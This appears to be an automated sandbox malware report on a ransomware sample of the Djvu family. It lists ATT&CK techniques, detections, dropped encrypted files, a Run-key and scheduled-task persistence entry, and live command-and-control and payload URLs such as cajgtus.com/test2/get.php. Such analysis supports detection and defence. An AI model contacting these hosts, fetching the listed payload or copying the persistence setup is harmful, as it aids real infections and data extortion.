          Command and Scripting Interpreter
          1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          2
          Obfuscated Files or Information
          LSASS Memory1
          Account Discovery
          Remote Desktop Protocol1
          Screen Capture
          21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Services File Permissions Weakness
          211
          Process Injection
          2
          Software Packing
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          NTDS24
          System Information Discovery
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Services File Permissions Weakness
          1
          Masquerading
          LSA Secrets1
          Query Registry
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
          Process Injection
          Cached Domain Credentials141
          Security Software Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Services File Permissions Weakness
          DCSync2
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          System Owner/User Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Network Configuration Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          [Behavior graph: Behavior Graph ID: 1431118, Sample: mU2p71KMss.exe, Startdate: 24/04/2024, Architecture: WINDOWS, Score: 100]

          Source | Detection | Scanner | Label | Link
          mU2p71KMss.exe | 100% | Avira | HEUR/AGEN.1313019 |
          mU2p71KMss.exe | 100% | Joe Sandbox ML | |
          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe | 100% | Avira | HEUR/AGEN.1313019 |
          C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe | 45% | ReversingLabs | Win32.Trojan.Generic |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          http://www.wikipedia.com/ | 0% | URL Reputation | safe |
          http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54 | 0% | Avira URL Cloud | safe |
          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error | 0% | Avira URL Cloud | safe |
          http://cajgtus.com/test2/get.php | 0% | Avira URL Cloud | safe |
          http://cajgtus.com/test2/get.phprk | 0% | Avira URL Cloud | safe |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          cajgtus.com | 62.150.232.50 | true | true | | unknown
          api.2ip.ua | 104.21.65.24 | true | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54 | true | Avira URL Cloud: safe | unknown
          https://api.2ip.ua/geo.json | false | | high
          http://cajgtus.com/test2/get.php | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
62.150.232.50 | cajgtus.com | Kuwait | 9155 | QNETKuwaitKW | true
104.21.65.24 | api.2ip.ua | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1431118
Start date and time: 2024-04-24 15:56:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: mU2p71KMss.exe (renamed because original name is a hash value)
Original Sample Name: e9ff14a975f084f01373d468c0b91a16.exe
Detection: MAL
Classification: mal100.rans.troj.evad.winEXE@18/287@4/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 94%
                                                                            • Number of executed functions: 28
                                                                            • Number of non-executed functions: 245
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • VT rate limit hit for: mU2p71KMss.exe
Time | Type | Description
15:56:53 | Task Scheduler | Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe s>--Task
15:56:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
15:57:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            62.150.232.50wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                            • sajdfue.com/files/1/build3.exe
                                                                            104.21.65.24sIQywRNC5M.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                              qJKiVKZdFk.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                    mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                      2llKbb9pR7.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                                        CDssd7jEvY.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                          SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                            WAhYftpepO.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                              6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                cajgtus.comsIQywRNC5M.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 63.143.98.185
                                                                                                qJKiVKZdFk.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 189.232.19.193
                                                                                                Z4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 189.163.142.13
                                                                                                SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 189.232.19.193
                                                                                                rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 200.45.93.45
                                                                                                8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                • 85.11.159.22
                                                                                                UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 189.245.19.217
                                                                                                3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                • 81.183.132.103
                                                                                                mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 58.151.148.90
                                                                                                JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 211.181.24.132
                                                                                                api.2ip.uasIQywRNC5M.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                qJKiVKZdFk.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                Z4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 172.67.139.220
                                                                                                SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 172.67.139.220
                                                                                                8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                • 172.67.139.220
                                                                                                UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                • 172.67.139.220
                                                                                                mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 172.67.139.220
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUShttp://gnoticiasimparciais.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.22.20.226
                                                                                                FW_ FHAS Inc_ - Private and Confidential.msgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                • 104.17.2.184
                                                                                                https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 172.67.203.167
                                                                                                Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 104.26.13.205
                                                                                                https://campaign-statistics.com/link_click/PJygYHTMZ2_OXDfP/30633247af9f78d20f1e067eab9a8276Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 172.66.40.88
                                                                                                sIQywRNC5M.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                http://crunchersflowdigital.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.18.70.113
                                                                                                file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                • 104.26.5.15
                                                                                                qJKiVKZdFk.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                https://0_kid43983.inibara.eu/Get hashmaliciousUnknownBrowse
                                                                                                • 104.21.34.12
                                                                                                QNETKuwaitKW2EFEN3j6ml.elfGet hashmaliciousUnknownBrowse
                                                                                                • 94.29.162.108
                                                                                                tWpGuzQQoW.elfGet hashmaliciousMiraiBrowse
                                                                                                • 94.29.194.1
                                                                                                g6W1NW8Q8t.elfGet hashmaliciousUnknownBrowse
                                                                                                • 62.150.37.222
                                                                                                UN8chkjVtu.elfGet hashmaliciousMiraiBrowse
                                                                                                • 62.150.37.241
                                                                                                wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                • 62.150.232.50
                                                                                                I9DNQsrT8I.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                • 94.29.162.165
                                                                                                skid.x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 62.150.212.202
                                                                                                E6l0C6FObI.elfGet hashmaliciousMiraiBrowse
                                                                                                • 62.150.245.4
                                                                                                9Y3FJARAlg.elfGet hashmaliciousMiraiBrowse
                                                                                                • 62.150.242.100
                                                                                                NCP3E3pc1H.elfGet hashmaliciousMiraiBrowse
                                                                                                • 94.29.180.166
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                No context
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):42
                                                                                                Entropy (8bit):4.927798970294787
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:fXA/yTcBMKqj:fXEyT5K0
                                                                                                MD5:4E7AA56344C4F657EFA4ABA820D9BFF4
                                                                                                SHA1:D1B1622A05D8A54BE43530EA69F95C6F8EBE75C5
                                                                                                SHA-256:9FCCDBDC4092CB6ECD26D9534A25052E2018516022315DB0A8913D841C2FAC7F
                                                                                                SHA-512:7E2D14976E3D19A9D4C89775F4F4DE032199491D1ED6BE9C3AA0238A6B53F9E4C62EEFCFC8096A7A77BA5CD5856940158716F9A3D1D3710A52FA64649CB0B2E3
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE..
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):342
                                                                                                Entropy (8bit):7.273377032657987
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:KWbbCDFa/wF0GhS/HT7mCznz/rzox4AavWfn/LXySL38W7UNCqeHXEyT5KITsciD:Nb2Za/wF02S/H3mQz/xKhD7UNcHXEyt2
                                                                                                MD5:606F65DD9F97FE26FB604BBB22BC5A72
                                                                                                SHA1:24985C1842876C2D5E9F720C618BD9CCEF3AC68D
                                                                                                SHA-256:B44066CF8A85E7C27D52DCB42815C6EA54DFF7B35CF64724A3CB1C2DD1BA2189
                                                                                                SHA-512:CADC91F6588D751DAFB1CF9A5472DCBBE6850647C861B6873CC41AAC1AA07A8401B96CF5B164C7E4B5D8636318E645F5E0A570A0E60C80F76D9BC67796EDB4E7
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:insec.f....]0.. ..oG.............,[...o..]...m.(J...@..7.0..#........C....d....k....+..w..k.Iw.".......J.W$..A...%....2.3....s..B.S=....F.:..S..NU##.X.....wzl...K........,X....J8:..)...2).n..e!......S.....Y.s.^E.......p".P......d..'...8........8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):628
                                                                                                Entropy (8bit):7.585823008457998
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:kE9teTWRRCmlHwdoRVnZhov3R3hY3PWOSXEytzIcii9a:pteCR4+wKlov3RhdOSXfzIbD
                                                                                                MD5:5A3E5F8A53CE08199443525BEECB05CA
                                                                                                SHA1:7EB890032EE7C30B7D10F9C127B5F77033F0EA13
                                                                                                SHA-256:88A87D4869963B346246892E2D03B7588803C54A347C75D3E4E0F7439325D6FE
                                                                                                SHA-512:9CCA61C53AD244EB9FCB5996449E886518248AAA89DBC619627474B81CB96561E8E6E04C35C285189C4A744A9C455CE479BE0E9BBCB4C90DE50DC874A05FF748
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:2023/.H....Z...../.46./=.8.7......5.u.....`.W.X....d..0......p..X.n.M....++..TV...}.P\f.kJ.d...|c{I.......Q.#p.6...5....Z....&.#......Id`m..}~z.Y..Nm.p..G..;U..URW<...P.....O.r(..@(.n...LE5..........6m...w_..k.D.Q..u._.J.\.K4f:..T.:....5R...f......|.d_!... ..3....1..Uw?....u.;.Y......'K....3..~#..9...,.z........y..o..=...-w.F..yQ...x+!..r.8.(wP.<.IiU..K....2|xg\X;... ^n;.x....L'A....J.UW8~.F.%.q.z.C x..vo..... ...UDa.{....).qu}.. -.:..o....H.8.F(..5....e.Qt..\.BQ.h.......E..............}......28.bl.r.....C.y4.q`..l..r8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):669
                                                                                                Entropy (8bit):7.714157400381269
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:kLi6qnjvfXALrux8Jk03J8QdotcASdTuYyIx5qMYdYbzzfQlkP6BKLLTSXEytzIX:B6yvfQPzm03DWc2YVXqzY7EBXfzIbD
                                                                                                MD5:4717A53D6460AA7D70471D7C0D3A9E37
                                                                                                SHA1:3A75B1386AB1A7F799F9BF6788D7F26A45EB9420
                                                                                                SHA-256:2962A8DEA51658DE68F971FF9BF899B6D0E9B4B20F60364FB2ED96865445D82F
                                                                                                SHA-512:DC71E319481432FB8ABFF0FE3EB6A2307A93E3FA66901F4A4DD021218E614289793C4FDFBEF9D77B0E59D2053287B1BFE0261098998C4800FABCF1FAE7F02715
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:2023/.8.tn.3.N["...ih.y.X].."h..i....}.....y./......E.7#.{..YbCf..-y.}@....g`...,..1.TY...M..j..^.....$.....++|.q..R'.'[K.&...P.hx.J..p..d..f.{.%..z.)!<7XR..h..1..C..[i..Fr...u.+......&....u..."..Z[Ee.\.......Y.K.(.....7..`.^....Z..a._s......um..]..8.a$21.:.1n.H(...N......F.ZP.sD..?.7.r....k..1.*.;...r5d..>......@y'X.(.5..M3`.A..mj.-T..o..Y....@.Y:.U..F.?..HN.<.'.p.0........4\`'..E.......o.\..u.&.k..z...1........].;.~..T>........ .eI1r1%.d.s....$.RnK.X.N.l...Z....Y..#......v.+.3.I.M.n..f.r...!.:.|~..@!...@..4...x.nT......>...F......l........Q(.}G.X8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):818
                                                                                                Entropy (8bit):7.732193557220087
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YKWML5wbOUJQL43AV3nzza0e3Pto1AmBVXfzIbD:YE5YV3AV3K0e1fmB9fzSD
                                                                                                MD5:4347EDC200ED8AF202189A0A83B45D88
                                                                                                SHA1:92D19EC0B5E429CB5DE7A2461EFEE669A4AE8A1D
                                                                                                SHA-256:258ED6CAA4EC55AB992715BAA6B641FD523E2DBE042EFB35BCBFF26AA7970EBC
                                                                                                SHA-512:41FCC722BAF329810C882D7CD578AC14D24611A96C2C33931F05E1112633304B4E14D79E201C8F2143018E2892006B22B20C0720186E176E6DC36E54106F3354
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:{"os_.iq..Pc.z.....q...h.b.D..W-/.x.s...[..k;....`..#HE.).,v(.S......o.........#...RF.5fK........-..!.".J.)..<B.f.~.D<...+.C............s.XF..x?..7..c...Q.kcS|.....y.\.7z.r.C....-.......8-9G./.cP.]%..2.~tM.g......."..X.r........t.e....]......!......8y..[f.4..eYX..;M.F..%.|b.`.H.;.|...!..ys.p27P(9.......aR#.;L.2....^..........}d.D^...|.....`x.......wa... ...<1K.........E]-CN...I.V+r.K.e..o..^..''...1..z.m....<.3...-R..?...!.....ny)..d.}..<.....~..e.;=l..h..&..f..J|l..Lr O...r.M.."!+..V.c.$.D-.}558V... ....X..%.Y..5...E..k`.v.V......./..jf..@......m.t.?..8..`Y..Q-..y.cw.C.}.7Q.y(.?d..z...P.......x..q.Q.q>...&...I.!..)on...<.Mo......o....tM..o..5.....:..6}h`0..9P..-]..c.Ud&.d.S.y].}....c..jF.......D8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3947
                                                                                                Entropy (8bit):7.952736752169177
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:Nz67YLwDTk0+TL1VE7NXvrKSATf+gyAaVVZ2NmdIF1:E74wDsTJahDKSA6gzah2Nmmb
                                                                                                MD5:021F4F188EF244CCA7EF0053F4BAB018
                                                                                                SHA1:1A4D3A1F8698F3B9D46EC24D22D602E707C6B3A2
                                                                                                SHA-256:44DA7C7A86CF500FB60965C2B5EDA47753DE045F71091CD004151696C98D6470
                                                                                                SHA-512:84FB6CC255C64D442337D12AEC6B138F5BAEABD43E6C5F780AC574F82EE1FEA7CEB4B58954FBCAB53FCDD257FE0DA8F49BF42ED2C231C58CDE6BE7C7902D1885
                                                                                                Malicious:false
                                                                                                Preview:*...#4.>.pC.^/{......._..<.G..EF.._:)#.E3...3&A...._M.....j=...M..O.L.h[.n..b.v:)d.]E_..A...1 .$.h{.T....@O..2.go..i....j.3u..B..c.7.R....S..H.&...........%.f..]R..r.YT.R{...9..R.."..%..(.5Z.%..u>..:.....|....;...e...l....."..>.....Z.s..p%....A...].....Zp$5{..s.@ .l..q.i....*.]....~e.|x!..7-{yR.9q.^.dg..-. T\EG;...e9.^..x@r...7.........!...!.U}...n.K.4.7.9SC...V..........`....J%.w........ .>o.....Uf.............w..|...D2..&(.=.W}..&...(.....K..W9@*T...........0........g...[sm.P......d-.9)Ok.[LD....){.X}a.......o...R..x...>.pe.ia......O.H..m.X|.'.z.(...u.....F..(........ t.=..w3.?..N.?.X.....+d....?.....t..y@h.... k#y.D^E&...X..^'5.N^..'...`./.@.....U.@.`V..,/^.......u!no.et.+..A..r...mZ.[.F|.o*.^.@.O.....b*.......5.w.}........=db]z.@..%......{D.oe...e.2w.`..'a.....W.....Y.,.....n.h.r.....0...#&...}.....=h.v7.OB....p......(.I!......j..x<.$0.8%)y.l*1...O..\0..+9F..kZQ.K..V..8,..`.vG.n.h....l.X...Dn.K.X.%V..1J...t..N....Fj..5..7Yd...b
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):657
                                                                                                Entropy (8bit):7.684216250456284
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:kLCz3s8we4sIQyyPzv31XjQxLeduZEalbZNrEn5hzGckQdRoSkBXfCSXEytzIciD:GYdP4pQymj3lQadwEG/rEtktKSXfzIbD
                                                                                                MD5:DE43E8947FF8984A95625B0CDEA83458
                                                                                                SHA1:FD646CDE97610FCD072D54913495C7C5922451A7
                                                                                                SHA-256:AA7548009666861C9A32C21F3CC73464F48258F4C709DA296BE7361F532BF9AA
                                                                                                SHA-512:7C299038BCCD7D6ECD891C0AB6BB5012D1D681E1303A79CB5E971DFA0076AEDB34C27E08BFEDD7C7D1FF7CA1749142DA26CEA6612EEF2E5A8FE17ED6640FFDA7
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):388
                                                                                                Entropy (8bit):7.367552833666105
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8+27a/+XQvHT5zPPZDIk+qRDSF13PfXEytzIcii9a:VmuHT5DPGdqhSfXfzIbD
                                                                                                MD5:7772516655E89FF7092E42D6E2AC2971
                                                                                                SHA1:E8E4E94899C21551909955E210DC1F3BE0AE23D5
                                                                                                SHA-256:127E246DCEE7E5B9574A80E58F0E0EC4750370DC2EEE4A76AE70AC70B556856D
                                                                                                SHA-512:668F26756CAC12B90A36850AA9FF4AABADD7A0DBB86D1EB4759EFDCE5E707D496FA5E6CC6FADEAF30C3BAD9DFAF3282B5EDDCC13ED8C5EDDA79BDAE349BC6F96
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):460
                                                                                                Entropy (8bit):7.492388878932036
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:GrBWpp486SCezxBp6oR7eqPKDXEytzIcii9a:GNOBIUQXfzIbD
                                                                                                MD5:286D63FA0907611861264FFB8D104813
                                                                                                SHA1:0E382948A3B3A9D67199767543832D18B157C229
                                                                                                SHA-256:A2710FA65846238705D429D6106F4B277972E5C145AC39CA4CF06698631D308E
                                                                                                SHA-512:0BD3066A577F508B7A32FBBE773AD8D3E2EBAD468810E22C6BFA73C9E7EF404BCC61D1F7635528F9FD9684B49F74FAA5651C4A1237C9BFEDBB4D12A72A2CE5A5
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):560
                                                                                                Entropy (8bit):6.016191131234533
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YGJ68OvcVMeYJD1+NkZnYOq7OzP4VLmvO7g75TXEytF:YgJOkVMG6mP7OzbtXfF
                                                                                                MD5:94474048DF3AD67A6D21142410CA6347
                                                                                                SHA1:47A9F2FD44E54A05A306511BCFE05950A8DD24EF
                                                                                                SHA-256:B5ADCEE4F57B9EEE3EC95AF8A723D5AA02569E738652B9615C64EE742491172E
                                                                                                SHA-512:521DB2ECB4357D39C4D18D84EC0874CDB3F1DD3A8380D5C78A5BB76B454D9F3084ECC065F9D3C4C98DEC10C91FE874FBCA20BDA6BD6E42C4CB51576A05519327
                                                                                                Malicious:false
                                                                                                Preview:{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA443iuR4tYZbKarxLg2U\/\\nydof4gr3PygF4BEuW0IipeRs8Y2Naj7JI9WZ+TVmOpmadPbcR+3b\/+L9aehm+kxm\\nvMXW6Rmhovbl2M2JHqkaQ3wyHwtfR+ZnGKexM\/vU+3f5JgdvdaYEijo\/4pANkKB8\\nR2SB3c72tZ20mm39CVLMyan8neT3+3grdqX9zggAbYBHCH53jQM9B63b+D77rswH\\nSc\/LEmqRXomjw7KXYR0JRF5DflXmm1JBaKxv1dGRTo8wtI0y5TtzbJfzPink7L39\\nEuKBpARLg3gZeW96dT5sA7C8ivMxrH1VBWA6MgiECMs1mBHXp\/lNdJhKu8XX3XFw\\nBQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE"}
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1381
                                                                                                Entropy (8bit):4.894754314393066
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNzk5LmFRqrs6314kA+GT/kF5M2/kJw31:WZHfv0pfNAU5WEYNzoLPs41rDGT0f/kS
                                                                                                MD5:F15A25EF13B3CE75045B3DF6EA5E17D6
                                                                                                SHA1:0D0B0F5B56C116B60493629C439F6F6E3C71A034
                                                                                                SHA-256:E0354E011380D81532488C5F04748521FAB0A4E4F10979DE977694BE6864B35F
